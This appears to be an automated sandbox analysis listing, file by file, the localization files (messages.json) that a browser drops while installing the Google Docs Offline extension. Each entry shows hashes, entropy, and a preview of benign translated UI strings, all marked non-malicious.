                                                                                                                                                                                                                                                                                                        SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                        SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1028
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                        MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                        SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                        SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                        SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):994
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                        MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                        SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                        SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                        SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2091
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                        MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                        SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                        SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                        SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2778
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                        MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                        SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                        SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                        SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1719
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                        MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                        SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                        SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                        SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):936
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                        MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                        SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                        SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                        SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3830
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                        MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                        SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                        SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                        SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1898
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                        MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                        SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                        SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                        SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                        MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                        SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                        SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                        SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):878
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                        MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                        SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                        SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                        SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2766
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                        MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                        SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                        SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                        SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
